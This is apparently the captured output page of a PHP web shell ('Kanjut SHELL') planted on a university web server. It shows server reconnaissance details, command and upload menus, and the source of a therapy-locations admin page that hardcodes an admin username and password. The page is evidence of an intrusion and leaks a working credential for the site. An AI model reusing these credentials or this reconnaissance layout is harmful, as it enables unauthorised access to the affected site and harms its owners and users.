Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 13.59.198.150
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jlsnowden/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jlsnowden/www/AFNupdatelocations.php
<!-- File name:AFNupdatelocations.php -->


<html>
<title> UPDATE THERAPY LOCATIONS</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inconsolata">
<link rel="stylesheet" href="https://www.w3schools.com/lib/w3-theme-blue-grey.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Open+Sans'>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">


<style>
body, html {
    height: 100%;
    font-family: "Inconsolata", sans-serif;
}
.bgimg {
    background-position: center;
    background-image: url("purple32.jpg");
    min-height: 70%;
}
.menu {
    display: none;
}
</style>
<BODY>
<!-- Header with image -->
<header class="bgimg w3-display-container w3-grayscale-min" id="home">
  <div class="w3-display-middle w3-center">
    <span class="w3-tag" style="font-size:50px"> UPDATE THERAPY LOCATIONS</span>
  </div>
</header>

<!-- Add a background color and large text to the whole page -->
<div class="w3-sand w3-grayscale w3-large">

<!-- Links (sit on top) -->
        <div class="w1-top">
                 <div class="w3-row w3-padding w3-black">
                        <div class="w3-col s2">
                                <a href="AFN.html" class="w3-button w3-block w3-black">HOME</a>
                        </div>
			<div class="w3-col s2">
                                <a href="AFNtypes.html" class="w3-button w3-block w3-black">TYPES OF ANXIETY</a>
                        </div>
 
		        <div class="w3-col s2">
                                <a href="AFNoptions.html" class="w3-button w3-block w3-black"> TREATMENT</a>
                        </div>
                        <div class="w3-col s2">
                                <a href="AFNlocationsdisplay.php" class="w3-button w3-block w3-black">THERAPY LOCATIONS </a>
                        </div>
                        <div class="w3-col s2">
                                <a href="AFNtips.html" class="w3-button w3-block w3-black">SUBMIT TIPS</a>
                       
			 </div>
                        <div class="w3-col s2">
                                <a href="AFNnewsletter.php" class="w3-button w3-block w3-black">GET UPDATES</a>

			 </div>
			<a href="AFNadmin.php" class="w3-bar-item w3-button w3-hide-small w3-right w3-padding-large w3-hover-white" title=" Admin Login"><i class="fa fa-user"></i></a>

                </div>
        </div>



<center>


<?php

session_start();

if($_SESSION['psw']== NULL && $_SESSION['user']==NULL)
{
$pass=$_POST['pass'];
$_SESSION['psw']= $pass;
$user=$_POST['user'];
$_SESSION['user']=$user;

}
else 
{
$pass=$_SESSION['psw'];
$user=$_SESSION['user'];

}

if($pass !="usvwccs" || $user!="admin")
        print "Wrong Password or Username";
else
{
?>




<FORM action=AFNupdatelocationsaction.php method=post>
<P><P>
Name of Facility:  <INPUT type=text name=place2>
<P>
City: <select name=city2 size=1>

<option>Norfolk </option>
<option>Virginia Beach</option>
<option>Portsmouth </option>
<option>Chesapeake </option>
<option>Newport News </option>
</select>

<P>
Address: <INPUT type=text name=add2>
<p>
Zip Code <INPUT type=text name=zip2>
<p>
More Information <INPUT type=text name=mi2>
<p>
<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>
</FORM>
<p>

<p><a href="AFNadminaction.php" class="w3-button w3-black w3-padding-large w3-large">GO BACK </a></p>
<p><a href="AFNadmin.php" class="w3-button w3-black w3-padding-large w3-large"> LOG OUT </a></p>			


<?php
 }
?>

</center>







</h1>



<P>
<P>
<P>
</center>



Stv3n404 - 2023